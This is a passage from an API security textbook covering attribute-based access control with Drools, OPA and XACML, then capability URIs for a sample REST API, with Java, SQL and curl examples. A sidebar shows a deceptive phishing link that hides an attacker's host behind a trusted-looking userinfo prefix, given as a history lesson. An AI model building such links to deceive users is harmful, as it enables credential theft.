            session.setGlobal("decision", decision);

            // Insert facts for each category of attributes.
            session.insert(new Subject(subject));
            session.insert(new Resource(resource));
            session.insert(new Action(action));
            session.insert(new Environment(env));

            // Run the rule engine to see which rules match the
            // request, then return the decision.
            session.fireAllRules();
            return decision;
        } finally {
            // Dispose of the session when finished.
            session.dispose();
        }
    }
}
As mentioned, Drools likes to work with strongly typed values, so you can wrap each
collection of attributes in a distinct class to make it simpler to write rules that match
each one, as shown in listing 8.12. Open DroolsAccessController.java in your editor
again and add the four wrapper classes from the following listing as inner classes to
the DroolsAccessController class.
Listing 8.12 Wrapping attributes in types

// Wrapper for subject-related attributes
public static class Subject extends HashMap<String, Object> {
    Subject(Map<String, Object> m) { super(m); }
}

// Wrapper for resource-related attributes
public static class Resource extends HashMap<String, Object> {
    Resource(Map<String, Object> m) { super(m); }
}

// Wrapper for action-related attributes
public static class Action extends HashMap<String, Object> {
    Action(Map<String, Object> m) { super(m); }
}

// Wrapper for environment-related attributes
public static class Environment extends HashMap<String, Object> {
    Environment(Map<String, Object> m) { super(m); }
}
You can now start writing access control rules. Rather than reimplementing all the
existing RBAC access control checks, you will just add an additional rule that prevents
moderators from deleting messages outside of normal office hours. Create a new file
accessrules.drl in the folder src/main/resources to contain the rules. Listing 8.13 shows the example rule. As in Java, a Drools rule file can contain package and import statements, so use those to import the Decision and wrapper classes you've just created.
Next, you need to declare the global decision variable that will be used to communi-
cate the decision by the rules. Finally, you can implement the rules themselves. Each
rule has the following form:
rule "description"
when
conditions
then
actions
end
The description can be any useful string to describe the rule. The conditions of the
rule match classes that have been inserted into the working memory and consist of
the class name followed by a list of constraints inside parentheses. In this case,
because the classes are maps, you can use the this["key"] syntax to match attributes
inside the map. For this rule, you should check that the HTTP method is DELETE
and that the hour field of the timeOfDay attribute is outside of the allowed 9-to-5
working hours. If the rule matches, the action of the rule will call the deny() method
of the decision global variable. You can find more detailed information about writing
Drools rules on the https://drools.org website, or from the book Mastering JBoss Drools 6,
by Mauricio Salatino, Mariano De Maio, and Esteban Aliverti (Packt, 2016).
Listing 8.13 An example ABAC rule

// Add package and import statements just like Java.
package com.manning.apisecurityinaction.rules;

import com.manning.apisecurityinaction.controller.DroolsAccessController.*;
import com.manning.apisecurityinaction.controller.ABACAccessController.Decision;

// Declare the decision global variable.
global Decision decision;

// A rule has a description, a when section with patterns,
// and a then section with actions.
rule "deny moderation outside office hours"
    when
        // Patterns match the attributes.
        Action( this["method"] == "DELETE" )
        Environment( this["timeOfDay"].hour < 9
                  || this["timeOfDay"].hour > 17 )
    then
        // The action can call the permit or deny methods on the decision.
        decision.deny();
end
Now that you have written an ABAC rule you can wire up the main method to apply
your rules as a Spark before() filter that runs before the other access control rules.
The filter will call the enforcePolicy method inherited from the ABACAccess-
Controller (listing 8.9), which populates the attributes from the requests. The base class then calls the checkPermitted method from listing 8.11, which will use Drools to evaluate the rules. Open Main.java in your editor and add the following lines to the
main() method just before the route definitions in that file:
var droolsController = new DroolsAccessController();
before("/*", droolsController::enforcePolicy);
Restart the API server and make some sample requests to see if the policy is being
enforced and is not interfering with the existing RBAC permission checks. To check
that DELETE requests are being rejected outside of office hours, you can either adjust
your computer’s clock to a different time, or you can adjust the time of day environ-
ment attribute to artificially set the time of day to 11 p.m. Open ABACAccessController
.java and change the definition of the timeOfDay attribute as follows:
envAttrs.put("timeOfDay", LocalTime.now().withHour(23));
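Alternatively, because the environment attributes are plain map entries, you can drive checkPermitted directly from a unit test without changing the clock or the controller. A sketch, assuming JUnit 5 on the test classpath and a test class in the same package as the controller:

import static org.junit.jupiter.api.Assertions.assertFalse;

import java.time.LocalTime;
import java.util.Map;
import org.junit.jupiter.api.Test;

class DroolsAccessControllerTest {
    @Test
    void deniesDeleteOutsideOfficeHours() {
        var controller = new DroolsAccessController();
        var decision = controller.checkPermitted(
            Map.<String, Object>of("user", "demo"),              // subject
            Map.<String, Object>of("path", "/spaces/1"),         // resource
            Map.<String, Object>of("method", "DELETE"),          // action
            Map.<String, Object>of("timeOfDay",
                LocalTime.of(23, 0)));                           // environment
        assertFalse(decision.isPermitted());
    }
}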
If you then try to make any DELETE request to the API it’ll be rejected:
$ curl -i -X DELETE \
-u demo:password https://localhost:4567/spaces/1/messages/1
HTTP/1.1 403 Forbidden
…
TIP
It doesn’t matter if you haven’t implemented any DELETE methods in
the Natter API, because the ABAC rules will be applied before the request is
matched to any endpoints (even if none exist). The Natter API implementa-
tion in the GitHub repository accompanying this book has implementations
of several additional REST requests, including DELETE support, if you want
to try it out.
8.3.3 Policy agents and API gateways
ABAC enforcement can become complex as policies grow. Although general-purpose rule engines such as Drools can simplify the process of writing ABAC rules,
specialized components have been developed that implement sophisticated policy
enforcement. These components are typically implemented either as a policy agent that
plugs into an existing application server, web server, or reverse proxy, or else as stand-
alone gateways that intercept requests at the HTTP layer, as illustrated in figure 8.4.
Figure 8.4 A policy agent can plug into an application server or reverse proxy to enforce ABAC policies. Some API gateways can also enforce policy decisions as standalone components.

For example, the Open Policy Agent (OPA, https://www.openpolicyagent.org) implements a policy engine using a DSL designed to make expressing access control decisions easy. It can be integrated into an existing infrastructure either using its REST API or as a Go library, and integrations have been written for various reverse proxies and gateways to add policy enforcement.
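For a flavor of what integration looks like, OPA exposes a documented REST data API that accepts a JSON input document and returns the policy's result. The sketch below uses Java 11's HttpClient; the policy path natter/authz/allow and the input fields are hypothetical, not part of any real deployment:

import java.net.URI;
import java.net.http.*;

var client = HttpClient.newHttpClient();
var request = HttpRequest.newBuilder()
        .uri(URI.create("http://localhost:8181/v1/data/natter/authz/allow"))
        .header("Content-Type", "application/json")
        .POST(HttpRequest.BodyPublishers.ofString(
            "{\"input\":{\"method\":\"DELETE\",\"path\":\"/spaces/1\"}}"))
        .build();
var response = client.send(request,
        HttpResponse.BodyHandlers.ofString());
// The response body is a JSON document such as {"result":true}.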
8.3.4 Distributed policy enforcement and XACML
Rather than combining all the logic of enforcing policies into the agent itself, another
approach is to centralize the definition of policies in a separate server, which provides
a REST API for policy agents to connect to and evaluate policy decisions. By centraliz-
ing policy decisions, a security team can more easily review and adjust policy rules for
all APIs in an organization and ensure consistent rules are applied. This approach is
most closely associated with XACML, the eXtensible Access-Control Markup Language
(see http://mng.bz/Qx2w), which defines an XML-based language for policies with a
rich set of functions for matching attributes and combining policy decisions. Although
the XML format for defining policies has fallen somewhat out of favor in recent years,
XACML also defined a reference architecture for ABAC systems that has been very
influential and is now incorporated into NIST’s recommendations for ABAC (http://
mng.bz/X0YG).
DEFINITION
XACML is the eXtensible Access-Control Markup Language, a
standard produced by the OASIS standards body. XACML defines a rich
XML-based policy language and a reference architecture for distributed pol-
icy enforcement.
The core components of the XACML reference architecture are shown in figure 8.5,
and consist of the following functional components:

- A Policy Enforcement Point (PEP) acts like a policy agent to intercept requests to an API and reject any requests that are denied by policy.
- The PEP talks to a Policy Decision Point (PDP) to determine if a request should be allowed. The PDP contains a policy engine like those you've seen already in this chapter.
- A Policy Information Point (PIP) is responsible for retrieving and caching values of relevant attributes from different data sources. These might be local databases or remote services such as an OIDC UserInfo endpoint (see chapter 7).
- A Policy Administration Point (PAP) provides an interface for administrators to define and manage policies.

Figure 8.5 XACML defines four services that cooperate to implement an ABAC system. The Policy Enforcement Point (PEP) rejects requests that are denied by the Policy Decision Point (PDP). The Policy Information Point (PIP) retrieves attributes that are relevant to policy decisions. A Policy Administration Point (PAP) can be used to define and manage policies.
The four components may be collocated or can be distributed on different machines.
In particular, the XACML architecture allows policy definitions to be centralized
within an organization, allowing easy administration and review. Multiple PEPs for dif-
ferent APIs can talk to the PDP via an API (typically a REST API), and XACML sup-
ports the concept of policy sets to allow policies for different PEPs to be grouped
together with different combining rules. Many vendors offer implementations of the
XACML reference architecture in some form, although often without the standard
XML policy language, providing policy agents or gateways and PDP services that you
can install into your environment to add ABAC access control decisions to existing
services and APIs.
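To give a feel for the PEP-to-PDP exchange, a decision request in the JSON Profile of XACML looks roughly like the following; the attribute identifiers here are shorthand forms, and the exact shape varies between profile versions and vendors:

{
  "Request": {
    "AccessSubject": {"Attribute": [
      {"AttributeId": "subject-id", "Value": "demo"}]},
    "Action": {"Attribute": [
      {"AttributeId": "action-id", "Value": "DELETE"}]},
    "Resource": {"Attribute": [
      {"AttributeId": "resource-id", "Value": "/spaces/1/messages/1"}]}
  }
}

The PDP then responds with a decision document such as {"Response": [{"Decision": "Deny"}]}.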
8.3.5 Best practices for ABAC
Although ABAC provides an extremely flexible basis for access control, its flexibility
can also be a drawback. It’s easy to develop overly complex rules, making it hard to
determine exactly who has access to what. I have heard of deployments with many
thousands of policy rules. Small changes to rules can have dramatic impacts, and it
can be hard to predict how rules will combine. As an example, I once worked on a sys-
tem that implemented ABAC rules in the form of XPath expressions that were applied
to incoming XML messages; if a message matched any rule, it was rejected.
It turned out that a small change to the document structure made by another team
caused many of the rules to no longer match, which allowed invalid requests to be
processed for several weeks before somebody noticed. It would’ve been nice to be able
to automatically tell when these XPath expressions could no longer match any mes-
sages, but due to the flexibility of XPath, this turns out to be impossible to determine
automatically in general, and all our tests continued using the old format. This anec-
dote shows the potential downside of flexible policy evaluation engines, but they are
still a very powerful way to structure access control logic.
To maximize the benefits of ABAC while limiting the potential for mistakes, con-
sider adopting the following best practices:
- Layer ABAC over a simpler access control technology such as RBAC. This provides a defense-in-depth strategy so that a mistake in the ABAC rules doesn't result in a total loss of security.
- Implement automated testing of your API endpoints so that you are alerted quickly if a policy change results in access being granted to unintended parties.
- Ensure access control policies are maintained in a version control system so that they can be easily rolled back if necessary. Ensure proper review of all policy changes.
- Consider which aspects of policy should be centralized and which should be left up to individual APIs or local policy agents. Though it can be tempting to centralize everything, this can introduce a layer of bureaucracy that can make it harder to make changes. In the worst case, this can violate the principle of least privilege because overly broad policies are left in place due to the overhead of changing them.
- Measure the performance overhead of ABAC policy evaluation early and often.
Pop quiz

7. Which are the four main categories of attributes used in ABAC decisions?
   a) Role
   b) Action
   c) Subject
   d) Resource
   e) Temporal
   f) Geographic
   g) Environment

8. Which one of the components of the XACML reference architecture is used to define and manage policies?
   a) Policy Decision Point
   b) Policy Retrieval Point
   c) Policy Demolition Point
   d) Policy Information Point
   e) Policy Enforcement Point
   f) Policy Administration Point

The answers are at the end of the chapter.
Answers to pop quiz questions

1. True. Many group models allow groups to contain other groups, as discussed in section 8.1.
2. a, c, d. Static and dynamic groups are standard, and virtual static groups are nonstandard but widely implemented.
3. d. groupOfNames (or groupOfUniqueNames).
4. c, d, e. RBAC only assigns permissions using roles, never directly to individuals. Roles support separation of duties, as typically different people define role permissions than those that assign roles to users. Roles are typically defined for each application or API, while groups are often defined globally for a whole organization.
5. c. The NIST model allows a user to activate only some of their roles when creating a session, which enables the principle of least privilege.
6. d. The @RolesAllowed annotation determines which roles can call the method.
7. b, c, d, and g. Subject, Resource, Action, and Environment.
8. f. The Policy Administration Point is used to define and manage policies.
Summary

- Users can be collected into groups on an organizational level to make them easier to administer. LDAP has built-in support for managing user groups.
- RBAC collects related sets of permissions on objects into roles which can then be assigned to users or groups and later revoked. Role assignments may be either static or dynamic.
- Roles are often specific to an API, while groups are more often defined statically for a whole organization.
- ABAC evaluates access control decisions dynamically based on attributes of the subject, the resource they are accessing, the action they are attempting to perform, and the environment or context in which the request occurs (such as the time or location).
- ABAC access control decisions can be centralized using a policy engine. The XACML standard defines a common model for ABAC architecture, with separate components for policy decisions (PDP), policy information (PIP), policy administration (PAP), and policy enforcement (PEP).
Capability-based security and macaroons

This chapter covers
- Sharing individual resources via capability URLs
- Avoiding confused deputy attacks against identity-based access control
- Integrating capabilities with a RESTful API design
- Hardening capabilities with macaroons and contextual caveats

In chapter 8, you implemented identity-based access controls that represent the mainstream approach to access control in modern API design. Sometimes identity-based access controls can come into conflict with other principles of secure API design. For example, if a Natter user wishes to share a message that they wrote with a wider audience, they would like to just copy a link to it. But this won't work unless the users they are sharing the link with are also members of the Natter social space it was posted to, because they won't be granted access. The only way to grant those users access to that message is to either make them members of the space, which violates the principle of least authority (because they now have access to all the messages in that space), or else to copy and paste the whole message into a different system.
People naturally share resources and delegate access to others to achieve their
goals, so an API security solution should make this simple and secure; otherwise, your
users will find insecure ways to do it anyway. In this chapter, you’ll implement capability-
based access control techniques that enable secure sharing by taking the principle of
least authority (POLA) to its logical conclusion and allowing fine-grained control over
access to individual resources. Along the way, you’ll see how capabilities prevent a gen-
eral category of attacks against APIs known as confused deputy attacks.
DEFINITION
A confused deputy attack occurs when a component of a system with
elevated privileges can be tricked by an attacker into carrying out actions that
the attacker themselves would not be allowed to perform. The CSRF attacks
of chapter 4 are classic examples of confused deputy attacks, where the web
browser is tricked into carrying out the attacker’s requests using the victim’s
session cookie.
9.1 Capability-based security
A capability is an unforgeable reference to an object or resource together with a set
of permissions to access that resource. To illustrate how capability-based security dif-
fers from identity-based security, consider the following two ways to copy a file on UNIX systems [1]:
cp a.txt b.txt
cat <a.txt >b.txt
The first, using the cp command, takes as input the name of the file to copy and the
name of the file to copy it to. The second, using the cat command, instead takes as
input two file descriptors: one opened for reading and the other opened for writing. It
then simply reads the data from the first file descriptor and writes it to the second.
DEFINITION
A file descriptor is an abstract handle that represents an open file
along with a set of permissions on that file. File descriptors are a type of
capability.
If you think about the permissions that each of these commands needs, the cp com-
mand needs to be able to open any file that you can name for both reading and writ-
ing. To allow this, UNIX runs the cp command with the same permissions as your own
user account, so it can do anything you can do, including deleting all your files and
emailing your private photos to a stranger. This violates POLA because the command
is given far more permissions than it needs. The cat command, on the other hand,
just needs to read from its input and write to its output. It doesn’t need any permis-
sions at all (but of course UNIX gives it all your permissions anyway). A file descriptor
is an example of a capability, because it combines a reference to some resource along
with a set of permissions to act on that resource.
[1] This example is taken from "Paradigm Regained: Abstraction Mechanisms for Access Control." See http://mng.bz/Mog7.
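The same contrast can be expressed in Java: a method that takes filenames needs (and can abuse) broad filesystem authority, while one that takes already-open streams can only use the handles it was given. A sketch:

import java.io.*;
import java.nio.file.*;

// Like cp: needs the authority to open arbitrary paths.
void copyByName(String from, String to) throws IOException {
    Files.copy(Path.of(from), Path.of(to));
}

// Like cat: needs no filesystem authority at all. The open streams
// are capabilities passed in by the caller.
void copyByHandle(InputStream in, OutputStream out) throws IOException {
    in.transferTo(out);
}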
Compared with the more dominant identity-based access control techniques dis-
cussed in chapter 8, capabilities have several differences:
- Access to resources is via unforgeable references to those objects that also grant authority to access that resource. In an identity-based system, anybody can attempt to access a resource, but they might be denied access depending on who they are. In a capability-based system, it is impossible to send a request to a resource if you do not have a capability to access it. For example, it is impossible to write to a file descriptor that your process doesn't have. You'll see in section 9.2 how this is implemented for REST APIs.
- Capabilities provide fine-grained access to individual resources, and often support POLA more naturally than identity-based systems. It is much easier to delegate a small part of your authority to somebody else by giving them some capabilities without giving them access to your whole account.
- The ability to easily share capabilities can make it harder to determine who has access to which resources via your API. In practice this is often true for identity-based systems too, as people share access in other ways (such as by sharing passwords).
- Some capability-based systems do not support revoking capabilities after they have been granted. When revocation is supported, revoking a widely shared capability may deny access to more people than was intended.
One of the reasons why capability-based security is less widely used than identity-based
security is due to the widespread belief that capabilities are hard to control due to easy
sharing and the apparent difficulty of revocation. In fact, these problems are solved by
real-world capability systems as discussed in the paper Capability Myths Demolished
by Mark S. Miller, Ka-Ping Yee, and Jonathan Shapiro (http://srl.cs.jhu.edu/pubs/
SRL2003-02.pdf). To take one example, it is often assumed that capabilities can be
used only for discretionary access control, because the creator of an object (such as a
file) can share capabilities to access that file with anyone. But in a pure capability system,
communications between people are also controlled by capabilities (as is the ability to
create files in the first place), so if Alice creates a new file, she can share a capability
to access this file with Bob only if she has a capability allowing her to communicate
with Bob. Of course, there’s nothing to stop Bob asking Alice in person to perform
actions on the file, but that is a problem that no access control system can prevent.
A brief history of capabilities
Capability-based security was first developed in the context of operating systems
such as KeyKOS in the 1970s and has been applied to programming languages and
network protocols since then. The IBM System/38, which was the predecessor of the
successful AS/400 (now IBM i), used capabilities for managing access to objects. In
the 1990s, the E programming language (http://erights.org) combined capability-based
security with object-oriented (OO) programming to create object-capability-based security
(or ocaps), where capabilities are just normal object references in a memory-safe OO programming language. Object-capability-based security fits well with conventional wisdom regarding good OO design and design patterns, because both emphasize eliminating global variables and avoiding static methods that perform side effects.
E also included a secure protocol for making method calls across a network using capabilities. This protocol has been adopted and updated by the Cap'n Proto (https://capnproto.org/rpc.html#security) framework, which provides a very efficient binary protocol for implementing APIs based on remote procedure calls. Capabilities are also now making an appearance on popular websites and REST APIs.

9.2 Capabilities and REST
The examples so far have been based on operating system security, but capability-
based security can also be applied to REST APIs available over HTTP. For example,
suppose you’ve developed a Natter iOS app that allows the user to select a profile pic-
ture, and you want to allow users to upload a photo from their Dropbox account.
Dropbox supports OAuth2 for third-party apps, but the access allowed by OAuth2
scopes is relatively broad; typically, a user can grant access only to all their files or else
create an app-specific folder separate from the rest of their files. This can work well
when the application needs regular access to lots of your files, but in this case your
app needs only temporary access to download a single file chosen by the user. It vio-
lates POLA to grant permanent read-only access to your entire Dropbox just to upload
one photo. Although OAuth scopes are great for restricting permissions granted to
third-party apps, they tend to be static and applicable to all users. Even if you had a
scope for each individual file, the app would have to already know which file it needed
access to at the point of making the authorization request. [2]
To support this use case, Dropbox developed the Chooser and Saver APIs (see https://
www.dropbox.com/developers/chooser and https://www.dropbox.com/developers/
saver), which allow an app developer to ask the user for one-off access to specific files
in their Dropbox. Rather than starting an OAuth flow, the app developer instead calls
an SDK function that will display a Dropbox-provided file selection UI as shown in fig-
ure 9.1. Because this UI is implemented as a separate browser window running on
dropbox.com and not as part of the third-party app, it can show all the user’s files.
When the user selects a file, Dropbox returns a capability to the application that
allows it to access just the file that the user selected for a short period of time (4 hours
currently for the Chooser API).
[2] There are proposals to make OAuth work better for these kinds of transactional one-off operations, such as https://oauth.xyz, but these largely still require the app to know what resource it wants to access before it begins the flow.
The Chooser and Saver APIs provide a number of advantages over a normal OAuth2
flow for this simple file sharing use case:
The app author doesn’t have to decide ahead of time what resource it needs to
access. Instead, they just tell Dropbox that they need a file to open or to save
data to and Dropbox lets the user decide which file to use. The app never gets
to see a list of the user’s other files at all.
Because the app is not requesting long-term access to the user’s account, there
is no need for a consent page to ensure the user knows what access they are
granted. Selecting a file in the UI implicitly indicates consent and because the
scope is so fine-grained, the risks of abuse are much lower.
The UI is implemented by Dropbox and so is consistent for every app and web
page that uses the API. Little details like the “Recent” menu item work consis-
tently across all apps.
For these use cases, capabilities provide a very intuitive and natural user experience
that is also significantly more secure than the alternatives. It’s often assumed that
there is a natural trade-off between security and usability: the more secure a system is,
the harder it must be to use. Capabilities seem to defy this conventional wisdom,
because moving to a more fine-grained management of permissions allows more con-
venient patterns of interaction. The user chooses the files they want to work with, and
the system grants the app access to just those files, without needing a complicated consent process.

Figure 9.1 The Dropbox Chooser UI allows a user to select individual files to share with an application. The app is given time-limited read-only access to just the files the user selects.
DEFINITION
When the permission to perform an action is automatically
granted to all requests that originate from a given environment this is known
as ambient authority. Examples of ambient authority include session cookies
and allowing access based on the IP address a request comes from. Ambient
authority increases the risks of confused deputy attacks and should be
avoided whenever possible.
9.2.1 Capabilities as URIs
File descriptors rely on special regions of memory that can be altered only by privi-
leged code in the operating system kernel to ensure that processes can’t tamper or
create fake file descriptors. Capability-secure programming languages are also able to
prevent tampering by controlling the runtime in which code runs. For a REST API,
this isn’t an option because you can’t control the execution of remote clients, so
another technique needs to be used to ensure that capabilities cannot be forged or tam-
pered with. You have already seen several techniques for creating unforgeable tokens in
chapters 4, 5, and 6, using unguessable large random strings or using cryptographic
Confused deputies and ambient authority
Many common vulnerabilities in APIs and other software are variations on what is
known as a confused deputy attack, such as the CSRF attacks discussed in chapter
4, but many kinds of injection attack and XSS are also caused by the same issue.
The problem occurs when a process is authorized to act with your authority (as your
“deputy”), but an attacker can trick that process to carry out malicious actions. The
original confused deputy (http://cap-lore.com/CapTheory/ConfusedDeputy.html) was
a compiler running on a shared computer. Users could submit jobs to the compiler
and provide the name of an output file to store the result to. The compiler would also
keep a record of each job for billing purposes. Somebody realized that they could pro-
vide the name of the billing file as the output file and the compiler would happily over-
write it, losing all records of who had done what. The compiler had permissions to
write to any file and this could be abused to overwrite a file that the user themselves
could not access.
In CSRF, the deputy is your browser that has been given a session cookie after you
logged in. When you make requests to the API from JavaScript, the browser automat-
ically adds the cookie to authenticate the requests. The problem is that if a malicious
website makes requests to your API, then the browser will also attach the cookie to
those requests, unless you take additional steps to prevent that (such as the anti-
CSRF measures in chapter 4). Session cookies are an example of ambient authority:
the cookie forms part of the environment in which a web page runs and is transpar-
ently added to requests. Capability-based security aims to remove all sources of
ambient authority and instead require that each request is specifically authorized
according to POLA.
300
CHAPTER 9
Capability-based security and macaroons
techniques to authenticate the tokens. You can reuse these token formats to create
capability tokens, but there are several important differences:
Token-based authentication conveys the identity of a user, from which their per-
missions can be looked up. A capability instead directly conveys some permis-
sions and does not identify a user at all.
Authentication tokens are designed to be used to access many resources under
one API, so are not tied to any one resource. Capabilities are instead directly
coupled to a resource and can be used to access only that resource. You use dif-
ferent capabilities to access different resources.
A token will typically be short-lived because it conveys wide-ranging access to a
user’s account. A capability, on the other hand, can live longer because it has a
much narrower scope for abuse.
REST already has a standard format for identifying resources, the URI, so this is the
natural representation of a capability for a REST API. A capability represented as a
URI is known as a capability URI. Capability URIs are widespread on the web, in the
form of links sent in password reset emails, GitHub Gists, and document sharing as in
the Dropbox example.
DEFINITION
A capability URI (or capability URL) is a URI that both identifies
a resource and conveys a set of permissions to access that resource. Typi-
cally, a capability URI encodes an unguessable token into some part of the
URI structure.
To create a capability URI, you can combine a normal URI with a security token.
There are several ways that you can do this, as shown in figure 9.2.
- https://api.example.com/resource?tok=abCd9.. (token in the query parameters)
- https://api.example.com/resource#tok=abCd9.. (token in the fragment)
- https://api.example.com/resource/abCd9.. (token encoded into the resource path)
- https://[email protected]/resource (token in the userinfo component)

Figure 9.2 There are many ways to encode a security token into a URI. You can encode it into the resource path, or you can provide it using a query parameter. More sophisticated representations encode the token into the fragment or userinfo elements of the URI, but these require some client-side parsing.
A commonly used approach is to encode a random token into the path component
of the URI, which is what the Dropbox Chooser API does, returning URIs like the
following:
https://dl.dropboxusercontent.com/1/view/8ygmwuqzf1l6x7c/
➥ book/graphics/CH08_FIG8.2_RBAC.png
In the Dropbox case, the random token is encoded into a prefix of the actual file
path. Although this is a natural representation, it means that the same resource may
be represented by URIs with completely different paths depending on the token, so a
client that receives access to the same resource through different capability URIs may
not be able to tell that they actually refer to the same resource. An alternative is to
pass the token as a query parameter, in which case the Dropbox URI would look like
the following:
https://dl.dropboxusercontent.com/1/view/
➥ book/graphics/CH08_FIG8.2_RBAC.png?token=8ygmwuqzf1l6x7c
There is a standard form for such URIs when the token is an OAuth2 token defined
by RFC 6750 (https://tools.ietf.org/html/rfc6750#section-2.3) using the parameter
name access_token. This is often the simplest approach to implement because it
requires no changes to existing resources, but it shares some security weaknesses with
the path-based approach:
- Both URI paths and query parameters are frequently logged by web servers and proxies, which can make the capability available to anybody who has access to the logs. Using TLS will prevent proxies from seeing the URI, but a request may still pass through several servers unencrypted in a typical deployment.
- The full URI may be visible to third parties through the HTTP Referer header or the window.referrer variable exposed to content running in an HTML iframe. You can use the Referrer-Policy header and rel="noreferrer" attribute on links in your UI to prevent this leakage. See http://mng.bz/1g0g for details.
- URIs used in web browsers may be accessible to other users by looking at your browser history.
To harden capability URIs against these threats, you can encode the token into the fragment component of the URI, or even the userinfo part that was originally designed
for storing HTTP Basic credentials in a URI. Neither the fragment nor the userinfo
component of a URI are sent to a web server by default, and they are both stripped
from URIs communicated in Referer headers.
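A sketch of what fragment encoding looks like in practice; the tokenId variable is assumed to come from a token store, and the client must extract the token itself and re-send it to the API (for example, in a query parameter or header), because the fragment never reaches the server:

// Server (or link generator) side: place the token in the fragment.
var capability = URI.create(
        "https://api.example.com/resource#access_token=" + tokenId);

// Client side: recover the token from the fragment before calling the API.
var fragment = capability.getFragment();   // "access_token=abCd9.."
var token = fragment.substring("access_token=".length());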
CAPABILITY URIS FOR REST APIS
The drawbacks of capability URIs just mentioned apply when they are used as a means
of navigating a website. When capability URIs are used in a REST API many of these
issues don’t apply:
- The Referer header and window.referrer variables are populated by browsers when a user directly navigates from one web page to another, or when one page is embedded into another in an iframe. Neither of these apply to the typical JSON responses from an API, because these are not directly rendered as pages.
- Similarly, because users don't typically navigate directly to API endpoints, these URIs will not end up in the browser history.
- API URIs are also unlikely to be bookmarked or otherwise saved for a long period of time. Typically, a client knows a few permanent URIs as entry points to an API and then navigates to other URIs as it accesses resources. These resource URIs can use short-lived tokens to mitigate against tokens being leaked in access logs. This idea is explored further in section 9.2.3.
In the remainder of the chapter, you’ll use capability URIs with the token encoded
into the query parameter because this is simple to implement. To mitigate any threat
from tokens leaking in log files, you’ll use short-lived tokens and apply further protec-
tions in section 9.2.4.
Credentials in URIs: A lesson from history
The desire to share access to private resources simply by sharing a URI is not new.
For a long time, browsers supported encoding a username and password into an HTTP URL in the form http://alice:[email protected]/resource. When such a link was
clicked, the browser would send the username and password using HTTP Basic
authentication (see chapter 3). Though convenient, this is widely considered to be a
security disaster. For a start, sharing a username and password provides full access
to your account to anybody who sees the URI. Secondly, attackers soon realized that
this could be used to create convincing phishing links such as http://www.google.com:[email protected]/login.html. An unsuspecting user would see the google
.com domain at the start of the link and assume it was genuine, when in fact this is
just a username and they will really be sent to a fake login page on the attacker’s
site. To prevent these attacks, browser vendors have stopped supporting this URI
syntax and most now aggressively remove login information when displaying or follow-
ing such links. Although capability URIs are significantly more secure than directly
sharing a password, you should still be aware of any potential for misuse if you dis-
play URIs to users.
9.2.2 Using capability URIs in the Natter API
To add capability URIs to Natter, you first need to implement the code to create a
capability URI. To do this, you can reuse an existing TokenStore implementation to
create the token component, encoding the resource path and permissions into the
token attributes as shown in listing 9.1. Because capabilities are not tied to an individ-
ual user account, you should leave the username field of the token blank. The token
can then be encoded into the URI as a query parameter, using the standard access
_token field from RFC 6750. You can use the java.net.URI class to construct the
capability URI, passing in the path and query parameters. Some of the capability URIs
you’ll create will be long-lived, but others will be short-lived to mitigate against tokens
being stolen. To support this, allow the caller to specify how long the capability should
live for by adding an expiry Duration argument that is used to set the expiry time of
the token.
Open the Natter API project [3] and navigate to src/main/java/com/manning/
apisecurityinaction/controller and create a new file named CapabilityController.java
with the content of listing 9.1 and save the file.
Pop quiz

1. Which of the following are good places to encode a token into a capability URI?
   a) The fragment
   b) The hostname
   c) The scheme name
   d) The port number
   e) The path component
   f) The query parameters
   g) The userinfo component

2. Which of the following are differences between capabilities and token-based authentication?
   a) Capabilities are bulkier than authentication tokens.
   b) Capabilities can't be revoked, but authentication tokens can.
   c) Capabilities are tied to a single resource, while authentication tokens are applicable to all resources in an API.
   d) Authentication tokens are tied to an individual user identity, while capability tokens can be shared between users.
   e) Authentication tokens are short-lived, while capabilities often have a longer lifetime.

The answers are at the end of the chapter.
[3] You can get the project from https://github.com/NeilMadden/apisecurityinaction if you haven't worked through chapter 8. Check out branch chapter09.
Listing 9.1 Generating capability URIs

package com.manning.apisecurityinaction.controller;

import com.manning.apisecurityinaction.token.SecureTokenStore;
import com.manning.apisecurityinaction.token.TokenStore.Token;
import spark.*;

import java.net.*;
import java.time.*;
import java.util.*;

import static java.time.Instant.now;

public class CapabilityController {

    // Use an existing SecureTokenStore to generate tokens.
    private final SecureTokenStore tokenStore;

    public CapabilityController(SecureTokenStore tokenStore) {
        this.tokenStore = tokenStore;
    }

    public URI createUri(Request request, String path, String perms,
                         Duration expiryDuration) {
        // Leave the username null when creating the token.
        var token = new Token(now().plus(expiryDuration), null);

        // Encode the resource path and permissions into the token.
        token.attributes.put("path", path);
        token.attributes.put("perms", perms);

        var tokenId = tokenStore.create(request, token);

        // Add the token to the URI as a query parameter.
        var uri = URI.create(request.uri());
        return uri.resolve(path + "?access_token=" + tokenId);
    }
}
You can now wire up code to create the CapabilityController inside your main
method, so open Main.java in your editor and create a new instance of the object
along with a token store for it to use. You can use any secure token store implementa-
tion, but for this chapter you’ll use the DatabaseTokenStore because it creates short
tokens and therefore short URIs.
NOTE
If you worked through chapter 6 and chose to mark the Database-
TokenStore as a ConfidentialTokenStore only, then you’ll need to wrap it in
a HmacTokenStore in the following snippet. Refer to chapter 6 (section 6.4) if
you get stuck.
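For example, the wiring might then look like the following sketch, assuming the HmacTokenStore.wrap factory method and the macKey loading from chapter 6:

var capController = new CapabilityController(
        HmacTokenStore.wrap(new DatabaseTokenStore(database), macKey));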
You should also pass the new controller as an additional argument to the SpaceController constructor, because you will shortly use it to create capability URIs:
var database = Database.forDataSource(datasource);
var capController = new CapabilityController(
new DatabaseTokenStore(database));
var spaceController = new SpaceController(database, capController);
var userController = new UserController(database);
Before you can start generating capability URIs, though, you need to make one tweak
to the database token store. The current store requires that every token has an associ-
ated user and will raise an error if you try to save a token with a null username.
Because capabilities are not identity-based, you need to remove this restriction. Open
schema.sql in your editor and remove the not-null constraint from the tokens table
by deleting the words NOT NULL from the end of the user_id column definition. The
new table definition should look like the following:
CREATE TABLE tokens(
    token_id VARCHAR(30) PRIMARY KEY,
    user_id VARCHAR(30) REFERENCES users(user_id), -- NOT NULL removed
    expiry TIMESTAMP NOT NULL,
    attributes VARCHAR(4096) NOT NULL
);
RETURNING CAPABILITY URIS
You can now adjust the API to return capability URIs that can be used to access social
spaces and messages. Where the API currently returns a simple path to a social space
or message such as /spaces/1, you’ll instead return a full capability URI that can be
used to access it. To do this, you need to add the CapabilityController as a new
argument to the SpaceController constructor, as shown in listing 9.2. Open SpaceController.java in your editor and add the new field and constructor argument.
Listing 9.2 Adding the CapabilityController

public class SpaceController {
    private static final Set<String> DEFINED_ROLES =
